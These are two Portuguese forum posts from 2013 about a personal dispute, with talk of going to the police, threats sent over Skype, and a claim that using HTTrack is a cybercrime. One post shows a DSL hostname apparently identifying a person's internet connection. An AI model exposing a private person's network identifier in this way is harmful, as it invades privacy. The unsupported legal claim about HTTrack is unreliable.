ThatGuyPT 457 Posted December 26, 2013 Me emocionei...., caraca velho se fores a policia dou te um pay de 10 xD ;_; XUEGUETenho tudo para isso, mas ele não responde ás ameaças que lhe fiz pelo skype, ainda vou pensar no caso.bl5-116-237.dsl.telepac.ptXUEGUE Share this post Link to post Share on other sites
ThatGuyPT 457 Posted December 26, 2013 Bem, e como o uso de HTTrack também é uma ofensa punida pelas leis do cyber-crime, deixo aqui mais uma prova de outro crime cometido pelo pastor alemão: